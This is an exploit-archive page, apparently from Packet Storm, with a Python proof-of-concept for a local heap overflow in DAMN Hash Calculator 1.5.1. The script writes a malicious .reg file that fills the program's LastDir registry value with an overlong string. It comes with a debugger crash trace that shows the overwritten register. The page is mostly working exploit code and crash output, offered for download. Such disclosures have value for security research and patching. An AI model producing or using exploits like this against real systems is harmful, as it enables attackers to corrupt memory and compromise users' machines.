what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

DAMN Hash Calculator 1.5.1 Heap Overflow

DAMN Hash Calculator 1.5.1 Heap Overflow
Posted Feb 23, 2012
Authored by Julien Ahrens

DAMN Hash Calculator version 1.5.1 local heap overflow proof of concept exploit.

tags | exploit, overflow, local, proof of concept
SHA-256 | 0a07425a5cb63b5c8cdabd7b39c0cd2a1863c4b2e2e5946de069c4370473370e

DAMN Hash Calculator 1.5.1 Heap Overflow

Change Mirror Download
#!/usr/bin/python
# Exploit Title: DAMN Hash Calculator v1.5.1 Local Heap Overflow PoC
# Version: 1.5.1
# Date: 2012-02-21
# Author: Julien Ahrens
# Homepage: http://www.inshell.net
# Software Link: http://www.google.com
# Tested on: Windows XP SP3 Professional German
# Notes: Old but nice software...just to proof it's there :-)
# Howto: Import Reg -> Start App -> Select File -> Cancel without choosing one
#7C9204E6 . 8B7D 08 MOV EDI,DWORD PTR SS:[EBP+8]
#7C9204E9 . 0B47 10 OR EAX,DWORD PTR DS:[EDI+10]
#7C9204EC . A9 00000269 TEST EAX,69020000
#7C9204F1 . 0F85 8BA70300 JNZ ntdll.7C95AC82
#7C9204F7 > 8B45 10 MOV EAX,DWORD PTR SS:[EBP+10]
#7C9204FA . 8A48 FD MOV CL,BYTE PTR DS:[EAX-3] <-- Crash
#7C9204FD . 83C0 F8 ADD EAX,-8
#7C920500 . F6C1 01 TEST CL,1
#7C920503 . 56 PUSH ESI
#7C920504 . 0F84 92A70300 JE ntdll.7C95AC9C
#7C92050A . F6C1 08 TEST CL,8
#7C92050D . 0F85 B3A70300 JNZ ntdll.7C95ACC6
#EAX 42424245
#ECX 00000008
#EDX 77C31AE8 msvcrt.77C31AE8
#EBX 0040F2F0 DAMN_Has.0040F2F0
#ESP 0012F54C
#EBP 0012F550
#ESI 0041A2DC ASCII "EBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
#EDI 00330000
#EIP 7C9204FA ntdll.7C9204FA
file="poc.reg"
junk1="\x41" * 392
boom="\x45\x42\x42\x42"
junk2="\x43" * 50
poc="Windows Registry Editor Version 5.00\n\n"
poc=poc + "[HKEY_CURRENT_USER\Software\DAMN\Hash Calculator\Settings]\n"
poc=poc + "\"LastDir\"=\"" + junk1 + boom + junk2 + "\""
try:
print "[*] Creating exploit file...\n";
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "[*] File successfully created!";
except:
print "[!] Error while creating file!";


Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    0 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    0 Files
  • 6
    Sep 6th
    0 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close